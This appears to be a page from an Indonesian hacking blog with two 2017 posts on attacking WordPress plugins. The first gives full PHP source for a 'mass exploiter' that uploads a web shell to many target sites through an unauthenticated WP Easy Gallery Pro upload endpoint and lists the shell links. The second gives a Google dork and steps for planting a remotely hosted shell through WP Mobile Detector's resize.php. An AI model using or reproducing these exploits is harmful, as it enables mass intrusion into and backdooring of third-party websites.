Showing posts with label wp. Show all posts
Showing posts with label wp. Show all posts

Saturday, February 25, 2017

WP Easy Gallery Pro Mass exploiter

WP Easy Gallery Pro Mass exploiter




# Title : 

WP Easy Gallery Pro Mass exploiter
# Coded by : Synchronizer

# Blog : annamcoder. tk


# Type : PHP


Code :
<center><br><br>
<font color="lime" size="6">
<b>WP EasyGallery exploiter</b></font>
<br><br>
<form action="" method="POST">
<textarea name="url" style="margin: 0px; width: 626px; height: 236px;">put your target without http://
example :

www.site.com
www.site2.com
www.site3.com
www.site4.com
www.site5.com
</textarea><br>
<br><br><input type="submit" class="btn btn-success" value="-=[ GO TO HELL SOON ]=-"/></form>
<br><br>
<?php
#===============================================#
#------------WP Easy Gallery Exploiter----------#
#------------Coded By Synchronizer--------------#
#-Gretz : Stupidc0de - IDCA - Indonesian Coder--#
#===============================================#
if(isset($_POST[url])) {
function StupidC0de($URL) {
if(!function_exists(curl_init)) {
die ("Curl PHP package not installed");
}
$uploadfile= "ha.php"; #your shell here
$synchronizer = curl_init();
curl_setopt($synchronizer, CURLOPT_POST, true);
curl_setopt($synchronizer, CURLOPT_POSTFIELDS,
array(qqfile=>"@$uploadfile",url=>"./"));
curl_setopt($synchronizer, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($synchronizer, CURLOPT_URL, $URL);
curl_setopt($synchronizer, CURLOPT_HEADER, false);
$response = curl_exec($synchronizer);
return $response;
}
$textarea = htmlspecialchars(trim($_POST[url]));
$j = explode(" ",$textarea);
foreach($j as $sync){
$n = StupidC0de($sync."/wp-content/plugins/wp-easy-gallery-pro/admin/php.php");
$b = str_replace({"success":true,"fileName":"///, "", $n);
$c = str_replace("}, "", $b);
$d = $sync."/wp-content/uploads/".$c;
if(preg_match(/{"success":true,"/,$n)==1) {
echo "<center><a href=http://$d target=_blank><font color=lime>$d</font></a> - <font color=green><b>SUKSES</b></font></center><br>";
} else {
echo "<center>".$sync."<font color=red><b> - FAILED !</b></font></center><br>";
}
}
}
?>

Available link for download

Read more »

Thursday, February 23, 2017

WordPress Plugins WP Mobile Detector Shell Upload Vulnerability

WordPress Plugins WP Mobile Detector Shell Upload Vulnerability



#- Title: WordPress Plugins WP Mobile Detector Shell Upload Vulnerability
#- Author: aaditya purani
#- Date: 2016/06/03
#- Developer : Jesse Friedman
#- Link Download : wordpress. org/plugins/wp-mobile-detector
#- Google Dork: inurl:"/plugins/wp-mobile-detector/"
#- Fixed in Version : 3.6 / Fixed exploit with resize script.
#- Tested on : windows
=======================================================
-- Proof Of Concept --

Description : 
Kelemahan ini telah terpecahkan untuk publik yaitu WP Mobile Detector Arbitrary File upload untuk versi 3.5. Dimana seorang attacker dapat mengupload  Malicious File / shell ke dalam sebuah website. Lebih dari 10.000 website terinfeksi bug ini. Tetapi vendor sudah merilis patch terbaru dari versi ini aitu versi 3.6 dan versi 3.7. Bahkan Securi sudah mempublikasikan kerentanan ini.

Vulnerability : site/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php]

Method : 
1. Cari Target.
2. Target/wp-content/plugins/wp-mobile-detector/resize.php?src=Link Shell Kamu
3. Jika berhasil maka shell tersebut akan tersimpan di dir /cache/

Format Shell > php

Need Shell Path ? Click Here 

Available link for download

Read more »